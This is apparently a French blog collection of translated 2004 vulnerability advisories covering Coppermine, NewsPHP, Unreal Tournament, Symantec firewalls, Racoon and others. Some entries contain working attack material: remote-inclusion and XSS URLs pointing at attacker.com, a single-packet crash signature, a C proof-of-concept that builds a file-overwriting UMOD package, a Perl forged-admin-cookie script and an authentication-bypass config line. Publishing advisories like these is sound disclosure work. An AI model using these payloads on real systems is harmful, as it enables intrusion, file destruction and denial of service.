Coppermine Photo Gallery est affecté par de multiples vulnérabilités au niveau de la validation des entrées. Certaines d'entre elles peuvent mener à l'exécution de commandes arbitraires. Ces vulnérabilités sont dues au mauvais filtrage de la part de l'application qui ne valident pas l'entrée écrite par l'utilisateur avant de l'employer dans des appels de fonction dynamiques d'exécution de commande de contenu et de système.



Ces vulnérabilités peuvent être exploitées pour voler les cookies d'un utilisateur, pour tracer le répertoire racine de l'application affectée, pour exécuter des commandes arbitraires et pour inclure les dossiers arbitraires. D'autres attaques sont également possibles.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Preuve de la vulnérabilité de type Cross site scripting:

http://www.exemple.com/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar">

Tracer le répertoire racine:

http://www.exemple.com/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..

Inclure un dossier arbitraire à distance:

http://www.exemple.com/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com

http://www.exemple.com/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com

http://www.exemple.com/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com

http://www.exemple.com/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com



-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Auncune solution disponible.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: Janek Vind
Traducteur FR: Z4rK
Référence: http://www.securityfocus.com/bid/10253

# posted by Laurent Bourrelly @ 4:54 PM

Sujet: phpwsBB Reveals Non-Anonymous Labels
Versions: phpwsBB 0.x phpwsContacts 0.x
Auteur: Stephen Adler
Traducteur FR: ThickParasite
Date: 28 avril 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Stephen Adler a rapporté une faille de sécurité dans phpwsBB phpwsContacts, permettant à des personnes malveillantes de voir des labels.

Le problème est que si l'affichage anonyme est désactivé, il est toujours possible de voir les labels des messages.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit nécessaire.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Mise à jour vers les versions phpwsBB 0.9.2 et phpwsContacts 0.8.3

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: Stephen Adler
Traducteur FR: ThickParasite
Référence: http://secunia.com/advisories/11480/

Sujet: Windows Explorer / Internet Exporer Long Share Name Buffer Overflow
Versions: Windows toutes versions, à part 2003. MS Internet Explorer 5.01, 5.5 et 6
Auteur: Rodrigo Gutierrez
Traducteur FR: ThickParasite
Date: 27 avril 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Rodrigo Gutierrez a découvert un faille de sécurité dans Windows et Internet Explorer, qui peut être exploitée par des personnes mal intentionnées pour compromettre le système d'un utilisateur.

Cette faille est causée par une erreur de boundary, qui peut être activée via Internet Explorer et Windows Explorer lors d'une connection à un serveur fichiers. Un buffer overflow peut être activé en paratgeant des fichiers corrompus avec un nom de plus de 300 bytes et ne contenant pas de minuscules.

L'exploitation de cette faille peut résulter en l'exécution de code arbitraire sur le système de la victime. Il suffit que l'utilisateur se connecte à un serveur, une page Web ou suive un lien qui ciblerait un fichier corrompu.

D'après Microsoft, la vulnérabilité aurait été adressée dans le SP1 pour Windows XP et le SP4 pour Windows 2000. Cependant, la vulnérabilité a été confirmée sur des systèmes à jour de ces versions. Windows 95,98, Me et NT 4.0 seraient aussi affectés.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit nécessaire.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Restreindre le trafic dans les routers et pare-feux

Désactiver "Client for Microsoft Networks" pour les cartes réseaux. Cela aura un impact sur le partage en réseau.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: Rodrigo Gutierrez
Traducteur FR: ThickParasite
Référence: http://secunia.com/advisories/11482/

Sujet: Fusion News Cross-Site Scripting Vulnerability
Versions: Fusion News 3.6.1
Auteur: DarkBicho
Traducteur FR: ThickParasite
Date: 24 avril 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Fusion News est une application gratuite en php. Ce produit est vulnérable aux attaques de type Cross Site Scripting (CSS), permettant à un agresseur d'injecter des codes HTML et des scripts dans les pages Web. Le visiteur croira que l'information vient du site consulté, alors qu'elle sera envoyée par l'agresseur.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

la vulnérabilité XSS est dans "fullnews.php"

http://site-vulnerable/fullnews.php?id= alert(document.cookie
-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Un patch est disponible sur le site du fabricant.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: DarkBicho
Traducteur FR: ThickParasite
Référence: http://www.security-corporation.com/articles-20040424-001.html

Sujet: Symantec Multiple Firewall TCP Options Denial of Service Vulnerability
Versions: Norton Internet Security 2003 et 2004 Personal Firewall 2003 et 2004 Client Firewall 5.01 et 5.11 Client Security 1.0
Auteur: EEYE
Traducteur FR: ThickParasite
Date: 24 avril 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Description :
*************
eEye Digital Security a découvert une faille de sécurité sérieuse de type "denial of service" dans les pare-feux pour Windows de Symantec. La faille permettrait à un agresseur distant de rendre le système inopérant à l'aide d'un seul paquet. La machine sera planté et il faut un accès "physique" pour rebooter. Cette faille existe au sein du composant qui enregistre les paquets TCP.

Description technique :
***********************
La faille existe dans SYMNDIS.SYS quand un paquet TCP essaye de se répandre dans les options TCP. Si un agresseur envoie un paquet TCP unique, avec option TCP de type SACK (05) ou Alternate Checksum Data (0F) suivie de 00/ Le driver SYMNDIS.SYS entre dans un loop infini qui va causer le crash total du système. Il faut un hard boot avec un accès physique au système pour rendre le système de nouveau opérationnel. L'agresseur a seulement besoin d'envoyer un seul paquet sur n'importe quel port du sytème, même si ce port est fermé. La faille est accessible même si le pare-feu ou IDS sont activé/désactivés. Ci-dessous, vous trouverez un morceau du paquet TCP SYN (longueur totale de 44 bytes) avec une mauvaise option SACK TCP.

40 00 57 4B 00 00 01 01 05 00

Le code vulnérable maintient un offset dans les bytes de l'option TCP et essaye de dépasser une longueur variable d'option en ajoutant sa longueur à l'offset. Si la longueur du champ de l'option est égale à 0, cela causera un loop infini et la crash du système.


-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit nécessaire.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Mettre à jour son pare-feu via LiveUpdate.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: EEYE
Traducteur FR: ThickParasite
Référence: http://www.security-corporation.com/articles-20040424-000.html

Sujet: Epic Games Unreal Tournament Engine UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability
Versions: Epic Games Unreal Engine versions 2003
Auteur: Luigi Auriemma
Traducteur FR: ThickParasite
Date: 22 avril 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Il a été rapporté que le moteur 3D d'Unreal Tournament est victime d'une faille de re-écriture de fichier en local à cause du fichier UMOD manifest.ini . Cette faille est due à une erreur de validation qui permettrait à un utilisateur malveillant de d'utiliser des fichiers arbitraires pour écrire et éventuellement arriver à un "denial of service" total.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit nécessaire.

Preuve du concept :
*******************
Cette fonction est utilisée pour calculer le checksum CRC utilisé dans les fichiers umod.
Les 2 méthodes :
printf("CRC: 0x%08lx\n", umodcrc("test.umod", 0));

fd = fopen("test.umod", "rb");printf("CRC: 0x%08lx\n", umodcrc(NULL, fd);

Valeur de renvoi :
0xffffffff (-1) ou la valeur du fichier CRC

En pratique, si vous transformez NULL en extension de fichier, la fonction utilisera le fichier descriptif comme second argument, autrement la fonction ouvrira le fichier en utilisant les premier paramètre.

Cette source est couverte par GNU.GPL


*/

#include
#include
#include
#include
#include "umodcrc.h"


#ifndef u_long
#define u_long unsigned long

#endif

#ifndef u_char

#define u_char unsigned char

#endif

#define UT2BUFFSZ 0x4000

/* complete CRC calculation */

u_long umodcrc(

u_char *filename, /* name of the file for CRC calculation */

FILE *fdopen /* FILE descriptor */

);
/* CRC algorithm */
u_long appmemcrc(

u_char *data, /* buffer containing the data from the file */

u_long size, /* size of the data */

u_long oldcrc /* previous CRC, it must start from 0 */

);

u_long gcrctable[] = {
0x00000000, 0x04c11db7, 0x09823b6e, 0x0d4326d9,
0x130476dc, 0x17c56b6b, 0x1a864db2, 0x1e475005,
0x2608edb8, 0x22c9f00f, 0x2f8ad6d6, 0x2b4bcb61,
0x350c9b64, 0x31cd86d3, 0x3c8ea00a, 0x384fbdbd,
0x4c11db70, 0x48d0c6c7, 0x4593e01e, 0x4152fda9,
0x5f15adac, 0x5bd4b01b, 0x569796c2, 0x52568b75,
0x6a1936c8, 0x6ed82b7f, 0x639b0da6, 0x675a1011,
0x791d4014, 0x7ddc5da3, 0x709f7b7a, 0x745e66cd,
0x9823b6e0, 0x9ce2ab57, 0x91a18d8e, 0x95609039,
0x8b27c03c, 0x8fe6dd8b, 0x82a5fb52, 0x8664e6e5,
0xbe2b5b58, 0xbaea46ef, 0xb7a96036, 0xb3687d81,
0xad2f2d84, 0xa9ee3033, 0xa4ad16ea, 0xa06c0b5d,
0xd4326d90, 0xd0f37027, 0xddb056fe, 0xd9714b49,
0xc7361b4c, 0xc3f706fb, 0xceb42022, 0xca753d95,
0xf23a8028, 0xf6fb9d9f, 0xfbb8bb46, 0xff79a6f1,
0xe13ef6f4, 0xe5ffeb43, 0xe8bccd9a, 0xec7dd02d,
0x34867077, 0x30476dc0, 0x3d044b19, 0x39c556ae,
0x278206ab, 0x23431b1c, 0x2e003dc5, 0x2ac12072,
0x128e9dcf, 0x164f8078, 0x1b0ca6a1, 0x1fcdbb16,
0x018aeb13, 0x054bf6a4, 0x0808d07d, 0x0cc9cdca,
0x7897ab07, 0x7c56b6b0, 0x71159069, 0x75d48dde,
0x6b93dddb, 0x6f52c06c, 0x6211e6b5, 0x66d0fb02,
0x5e9f46bf, 0x5a5e5b08, 0x571d7dd1, 0x53dc6066,
0x4d9b3063, 0x495a2dd4, 0x44190b0d, 0x40d816ba,
0xaca5c697, 0xa864db20, 0xa527fdf9, 0xa1e6e04e,
0xbfa1b04b, 0xbb60adfc, 0xb6238b25, 0xb2e29692,
0x8aad2b2f, 0x8e6c3698, 0x832f1041, 0x87ee0df6,
0x99a95df3, 0x9d684044, 0x902b669d, 0x94ea7b2a,
0xe0b41de7, 0xe4750050, 0xe9362689, 0xedf73b3e,
0xf3b06b3b, 0xf771768c, 0xfa325055, 0xfef34de2,
0xc6bcf05f, 0xc27dede8, 0xcf3ecb31, 0xcbffd686,
0xd5b88683, 0xd1799b34, 0xdc3abded, 0xd8fba05a,
0x690ce0ee, 0x6dcdfd59, 0x608edb80, 0x644fc637,
0x7a089632, 0x7ec98b85, 0x738aad5c, 0x774bb0eb,
0x4f040d56, 0x4bc510e1, 0x46863638, 0x42472b8f,
0x5c007b8a, 0x58c1663d, 0x558240e4, 0x51435d53,
0x251d3b9e, 0x21dc2629, 0x2c9f00f0, 0x285e1d47,
0x36194d42, 0x32d850f5, 0x3f9b762c, 0x3b5a6b9b,
0x0315d626, 0x07d4cb91, 0x0a97ed48, 0x0e56f0ff,
0x1011a0fa, 0x14d0bd4d, 0x19939b94, 0x1d528623,
0xf12f560e, 0xf5ee4bb9, 0xf8ad6d60, 0xfc6c70d7,
0xe22b20d2, 0xe6ea3d65, 0xeba91bbc, 0xef68060b,
0xd727bbb6, 0xd3e6a601, 0xdea580d8, 0xda649d6f,
0xc423cd6a, 0xc0e2d0dd, 0xcda1f604, 0xc960ebb3,
0xbd3e8d7e, 0xb9ff90c9, 0xb4bcb610, 0xb07daba7,
0xae3afba2, 0xaafbe615, 0xa7b8c0cc, 0xa379dd7b,
0x9b3660c6, 0x9ff77d71, 0x92b45ba8, 0x9675461f,
0x8832161a, 0x8cf30bad, 0x81b02d74, 0x857130c3,
0x5d8a9099, 0x594b8d2e, 0x5408abf7, 0x50c9b640,
0x4e8ee645, 0x4a4ffbf2, 0x470cdd2b, 0x43cdc09c,
0x7b827d21, 0x7f436096, 0x7200464f, 0x76c15bf8,
0x68860bfd, 0x6c47164a, 0x61043093, 0x65c52d24,
0x119b4be9, 0x155a565e, 0x18197087, 0x1cd86d30,
0x029f3d35, 0x065e2082, 0x0b1d065b, 0x0fdc1bec,
0x3793a651, 0x3352bbe6, 0x3e119d3f, 0x3ad08088,
0x2497d08d, 0x2056cd3a, 0x2d15ebe3, 0x29d4f654,
0xc5a92679, 0xc1683bce, 0xcc2b1d17, 0xc8ea00a0,
0xd6ad50a5, 0xd26c4d12, 0xdf2f6bcb, 0xdbee767c,
0xe3a1cbc1, 0xe760d676, 0xea23f0af, 0xeee2ed18,
0xf0a5bd1d, 0xf464a0aa, 0xf9278673, 0xfde69bc4,
0x89b8fd09, 0x8d79e0be, 0x803ac667, 0x84fbdbd0,
0x9abc8bd5, 0x9e7d9662, 0x933eb0bb, 0x97ffad0c,
0xafb010b1, 0xab710d06, 0xa6322bdf, 0xa2f33668,
0xbcb4666d, 0xb8757bda, 0xb5365d03, 0xb1f740b4 };








u_long umodcrc(u_char *filename, FILE *fdopen) {
FILE *fd;
int err,
len;
u_char *buff;
u_long crc = 0x00000000,
oldoff = 0;
struct stat xstat;




if(filename) {

fd = fopen(filename, "rb");

if(!fd) return(-1);

} else {

fd = fdopen;
oldoff = ftell(fd); // methodic and ordinate 8-)
}



err = fstat(fileno(fd), &xstat);


if(err < 0) return(-1);
if(xstat.st_size >= 20) xstat.st_size -= 20;

else return(-1);



buff = malloc(UT2BUFFSZ);
if(!buff) return(-1);
len = UT2BUFFSZ;


do {

if(len > xstat.st_size) len = xstat.st_size;
err = fread(buff, len, 1, fd);
if(err != 1) break;
crc = appmemcrc(buff, len, crc);
xstat.st_size -= len;

} while(xstat.st_size);

if(filename) fclose(fd);

else fseek(fd, oldoff, SEEK_SET);



free(buff);

return(crc);

}

u_long appmemcrc(u_char *data, u_long size, u_long oldcrc)
{

oldcrc = ~oldcrc;

for(; size > 0; size--, data++) {

oldcrc = (oldcrc << 8) ^ gcrctable[*data ^ (oldcrc >> 24)];

}

return(~oldcrc);

}

/********************************************************************/

#ifdef WIN32
#include
#include

#define u_long unsigned long
#define u_char unsigned char
#else
#include
#include
#endif

#define VER "0.1"
#define BUFFSZ 16384
#define UMODSIGN 0x9fe3c5a3
#define MANIFEST \
"[Setup]\n" \
"Product=Arbitrary file ovewriting by Luigi Auriemma\n" \
"Version=1\n" \
"Archive=%s\n" \
"SrcPath=.\n" \
"MasterPath=..\n" \
"StartProduct=UMODPoC\n" \
"\n" \
"Group=SetupGroup\n" \
"\n" \
"[SetupGroup]\n" \
"Copy=(Src="MANINI",Master="MANINI",Flags=3)\n" \
"File=(Src=%s)\n"
#define MANINI "System\\Manifest.ini"

void std_err(void);
void io_err(void);

int main(int argc, char *argv[]) {
FILE *fdin,
*fdmod;
u_char *buff;
u_long offset,
manifestsz;
int err;
struct stat xstat;
struct end {
u_long sign;
u_long indexstart;
u_long indexend;
u_long one;
u_long crc;
} end;


setbuf(stdout, NULL);

fputs("\n"
"UMOD arbitrary file overwriting proof-of-concept maker "VER"\n"
" Vulnerable games:\n"
" - Unreal Tournament <= 451b\n"
" - Unreal Tournament 2003 <= 2225\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 4) {
printf("\n"
"Usage: %s <\"fake_file_name\"> \n"
"\n"
"You must use a filename with directory traversal exploitation\n"
"For example:\n"
"..\\..\\..\\autoexec.bat\n"
"..\\..\\..\\windows\\system.ini\n"
"\n"
"Simple usage example:\n"
"\n"
"%s malicious.exe \"..\\..\\..\\windows\\notepad.exe\" useme.umod\n"
"\n", argv[0], argv[0]);
exit(1);
}

printf("Opening %s\n", argv[1]);
fdin = fopen(argv[1], "rb");
if(!fdin) std_err();
err = fstat(fileno(fdin), &xstat);
if(err < 0) std_err();
printf("Size: %lu\n\n", xstat.st_size);

buff = malloc(BUFFSZ + 1);
if(!buff) std_err();

manifestsz = snprintf(
buff,
BUFFSZ,
MANIFEST,
argv[3],
argv[2]);

printf("Build virtual "MANINI"\n"
"Size: %lu\n"
"\n", manifestsz);

printf("Creating %s\n\n", argv[3]);
fdmod = fopen(argv[3], "wb");
if(!fdmod) std_err();

if(fwrite(buff, manifestsz, 1, fdmod) != 1) io_err();
err = manifestsz;
while(err & 0xf) { /* useless but all the UMODs does the same */
fputc(0x00, fdmod);
err++;
}

offset = ftell(fdmod); // malicious file offset

while(1) {
err = fread(buff, 1, BUFFSZ, fdin);
if(!err) break;
if(fwrite(buff, err, 1, fdmod) != 1) io_err();
}
fclose(fdin);
err = ftell(fdmod);
while(err & 0xf) { /* useless but all the UMODs does the same */
fputc(0x00, fdmod);
err++;
}

end.indexstart = err; // starting of index

fputc(2, fdmod); // number of files

fputc(sizeof(MANINI) - 1, fdmod); // filename size
fwrite(MANINI, sizeof(MANINI) - 1, 1, fdmod); // filename
fwrite("\x00\x00\x00\x00", 4, 1, fdmod); // starting offset
fwrite((void *)&manifestsz, 4, 1, fdmod); // size of the file
fwrite("\x03\x00\x00\x00", 4, 1, fdmod); // flag

err = strlen(argv[2]) + 1;
fputc(err, fdmod);
fwrite(argv[2], err, 1, fdmod);
fwrite((void *)&offset, 4, 1, fdmod);
fwrite((void *)&xstat.st_size, 4, 1, fdmod);
fwrite("\x00\x00\x00\x00", 4, 1, fdmod);

end.sign = UMODSIGN; // umod sign
end.indexend = ftell(fdmod) + sizeof(end); // index ending
end.one = 1; // 1
end.crc = 0x00000000; // crc (calculated later)

fwrite((void *)&end, sizeof(end), 1, fdmod);

/* crc checking */
fflush(fdmod);
end.crc = umodcrc(argv[3], 0);
fseek(fdmod, -4, SEEK_CUR);
fwrite((void *)&end.crc, 4, 1, fdmod);

fclose(fdmod);

printf("\n"
"Informations about %s:\n"
"-------------------\n"
"Index section offset: 0x%08lx\n"
"Total package size: %lu\n"
"CRC: %08lx\n"
"\n"
"Files contained:\n"
MANINI" (used for installation)\n"
"%s\n"
"\n"
"Proof-of-concept successfully created!\n",
argv[3],
end.indexstart,
end.indexend,
end.crc,
argv[2]);

return(0);
}




void std_err(void) {
perror("\nError");
exit(1);
}

void io_err(void) {
fputs("\nError: I/O error, the file is incomplete or the disk space is finished\n", stdout);
exit(1);
}

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Cette faille a été corrigé dans la dernière version du jeu Unreal Tournament 2004.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: Luigi Auriemma
Traducteur FR: ThickParasite
Référence: http://www.securityfocus.com/bid/10196/info/

# posted by Laurent Bourrelly @ 4:32 PM

Sujet: NewsPHP Admin Access and Cross Site Scripting Vulnerability
Versions: NewsPHP (toutes versions)
Auteur: Manuel Lopez
Traducteur FR: ThickParasite
Date: 12 avril 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Description :
*************
NewsPHP est une solution de publication Web, comme un magazine, journal ou portail de news online. Il marche comme un gestionnaire de contenu qu'il est facile d'installer et de gérer sans avoir à uploader par FTP à chaque fois que vous voulez faire des mises à jour.

Vulnérabilités :
***************
Une faille de sécurité dans l'application permet aux agresseurs de passer pour des administrateurs en plaçant un faux cookie Administrateur sur leur ordinateur.

Une faille dans le File Upload du panel Admin permet aux utilisateurs d'uploader du code arbitraire à la place d'un fichier vidéo.

Cette application est aussi vulnérable aux attaques de type CSS (Cross Site Scripting).

Vulnérabilité du cookie:
************************
Cette faille est causée parce que les datas du cookie ne sont pas proprement vérifiées pour les droits administrateurs.
Ceci est le cookie et le POC pour accèder aux droits admin dans NewsPHP :

### autorized=admin; root=admin ###


## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------

#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm

use IO::Socket;
if (@ARGV < 3)
{
print "\n\n";
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "By: Manuel Lopez mantra at gulo.org\n";
print "\n\n";
exit(1);
}

$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];

print "\n";
print "----- Conecting .. ====\n\n";
$socket = IO::Socket::INET->new(Proto "tcp",
PeerAddr "$host",PeerPort "80") || die "$socket error $!";
print " Conected\n";
print " Sending Data .. \n";
$socket-print(fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin

fin
print " OK\n";
print " Generating $fichero ...\n";
open( Result, "$fichero");
print Result while <$socket>;
close Result;

##--------------------------

Cross-Site Scripting :
**********************
Un utilisateur distant peut conduire une attaque de type CSS à cause d'une faille dans la validation de la variable cat_id.
/index.php?cat_id=[XSS]

Vulnérabilité de l'upload de fichier :
**************************************
Un utilisateur avec les droits privilégiés peut uploader du code exécutable à la place d'une vidéo dans le panel Administration. Une fois que le code est uploadé, un utilisateur peut exécuter du code en appelant ce fichier, au travers d'un serveur Web.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit n'est nécessaire.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Aucune solution connue.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: Manuel Lopez
Traducteur FR: ThickParasite
Référence: http://www.security-corporation.com/articles-20040412-001.html

Sujet: REAL One Player R3T File Format Stack Overflow Vulnerability
Versions: Real One Player toutes versions
Auteur: Mark Litchfield
Traducteur FR: ThickParasite
Date: 7 avril 2004

-------------------------------------------------------------------------------------------------------------------------------

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

-------------------------------------------------------------------------------------------------------------------------------

| Détails |

Description
***********
RealOne/RealPlayer est un des produits les plus utilisés pour la lecture de media via Internet. Il y a actuellement plus de 200 millions d'utilisateurs dans le monde.

Details
*******
En créant un fichier .R3T hybride, il est possible de créer un débordement de la pile dans RealOne/RealPlayer. En forçant l'affichage d'une fenêtre du navigateur sur une page Web contenant le fichier, du code peut être exécuté sur la machine cible, au cas où l'utilisateur est connecté. Autrement, un fichier joint à un email peut contenir le fichier et l'utilisateur l'exécute en ouvrant la pièce jointe.


-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit disponible.

-------------------------------------------------------------------------------------------------------------------------------

| Solution |

Ne pas utiliser RealOnePlayer.

-------------------------------------------------------------------------------------------------------------------------------

| Copyrights |

Auteur: Mark Litchfield
Traducteur FR: ThickParasite
Référence: http://www.security-corporation.com/articles-20040407-000.html

Sujet: KAME IKE Daemon Racoon RSA Signature Authentication Vulnerability
Versions: KAME IKE Daemon Racoon
Auteur: Ralf Spenneberg
Traducteur FR: ThickParasite
Date: 8 avril 2004

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

| Détails |

Résumé :
********
Le Racoon KAME IKE Daemon identifie l'utilisateur pendant la Phase 1 en utilisant des clefs pré-partagées, signatures RSA ou GSS-API. Quand des signatures RSA sont utilisées, Racoon valide le certificat X.509 utilisé par l'utilisateur mais pas la signature RSA. Si l'utilisateur envoie un certificat valide X.509 pendant la phase 1, n'importe quelle clef peut être utilisée pour générer une signature RSA. L'indentification sera réussie.

Impact :
********
Très fort ! Le Racoon est l'IKE Daemon le plus utilisé sur les plateformes BSD et sur le noyau natif de la pile Linux kernel IPsec 2.6. Si l'agresseur a accès à une clef valide du certificat X.509, il peut établir une connection IPsec au Racoon et démarrer son attaque.

-------------------------------------------------------------------------------------------------------------------------------

| Exploit |

Aucun exploit nécessaire. Le Racoon lui-même peut-être utilisé pour exploiter cette faille de sécurité. La ligne de configuration importante :
certificate_type x509 certificate badprivatekey;
Si le certificat est validé par le Racoon cible, l'agresseur peut se connecter en utilisant n'importe quelle "badprivatekey".

Description technique :
***********************
In function eay_rsa_verify() in file crypto_openssl.c:
[...]
evp = d2i_PUBKEY(NULL, &bp, pubkey->l);
if (evp == NULL)
return 0;
[...]
Dans ce contexte, la fonction d2i_PUBKEY renvoie toujours un NULL. La fonction revient alors avec le code 0 (succès). La verification de la signature ne se fait pas.

| Solution |

Mise à jour nécessaire. Il n'y a pas de contournement connu.
Pour les produits ipsec : http://ipsec-tools.sf.net
KAME : voir le CVS
Gentoo a publié son advisory

| Copyrights |

Auteur: Ralf Spenneberg
Traducteur FR: ThickParasite
Référence: http://www.security-corporation.com/articles-20040408-000.html

Sujet: Panda ActiveScan Buffer Overflow and Denial of Service Vulnerability
Versions: Panda ActivScan 5.0
Auteur: Rafel Ivgi, The-Insider
Traducteur FR: ThickParasite
Date: 6 avril 2004

1 | Détails |
2 | Exploit |
3 | Solution |
4 | Copyrights |

| Détails |

Introduction :
**************
Panda ActivScan 5.0 est un utilitaire gratuit permettant de détecter et d'éliminer les virus. Il détecte et élimine plus de 66.000 virus. Il scan les emails et fichiers compressés. Il se met à jour quotidiennement et il averti dès que de nouvelles menaces apparaissent.

Bug :
*****
Panda ActiveScan 5.0 installe et enregistre "ascontrol.dll" qui contient les objets COM suivants :
ASControl Type Library:
{A52FF42A-9D92-4C41-B3B7-87EBB1B84839}
ASControl.ReportHebrew.1(any language) -
{237AFA6B-D75C-445B-9D87-68DB699FAB32}
ASControls.InstallEngineCtl.1 -
{6E449683-C509-11CF-AAFA-00AA00B6015C}
ASControl.Seleccion.1 -
{6CEC0297-FAFB-41FB-97EA-77E3081B1DFE}
ASControl.Lista.1 -
{4826196E-5CD9-4029-A1D3-789D4651D2C2}
ASControl.ControlConexion.1 -
{6FDCDD41-6C97-4A3B-9E6D-0144B66A1CE4}

Après la première utilisation d'activeScan, ce type
d'objet peut être créé en local et à distance ! Ceci affectera probablement
probablement tout autre langage de rapport des objets.

Par exemple :
Set object = CreateObject("ASControl.ReportHebrew.1" )

La vulnérabilité apparaît dans la propriété "International" de l'objet. Ce qui signifie que la tâche suivante :
object.Internacional = [Long String - 'A'>255] causera un
buffer overflow, permettant à un utilisateur à distance d'exécuter du code arbitraire au niveau du système.

Une autre vulnérabilité apparaît dans la fonction de "SetSitesFile" de l'objet Install Engine. Set object = CreateObject("ASControls.InstallEngineCtl.1" )
La fonction reçoit les paramètres suivants :
object.SetSitesFile(url as string{must exist}, Region as const, language as
const)
Cependant, l’utilisation de cette fonction cause un crash du logiciel. Ce qui signifie que la tâche suivante :
Set object = CreateObject("ASControls.InstallEngineCtl.1" )
object.SetSitesFile "http://rafiwarez.tripod.com/ncx.exe", ASIA, hebrew
causera un crash du logiciel et fermera cette fenêtre d'Internet
Explorer.

* Addon : L'Antivirus Panda Titanium 7 n'offre pas le scan par
le menu de bouton de souris d'intégration(click droit) aux caractères non-alphabétiques.

Le Code :
*********
------------------- COUPER ICI -------------------

------------------- COUPER ICI -------------------

et

------------------- COUPER ICI -------------------

------------------- COUPER ICI -------------------


| Exploit |

Aucun exploit connu à ce jour.

| Solution |

Aucune solution proposée.

| Copyrights |

Auteur: Rafel Ivgi, The-Insider
Traducteur FR: ThickParasite
Référence: http://www.security-corporation.com/articles-20040406-000.html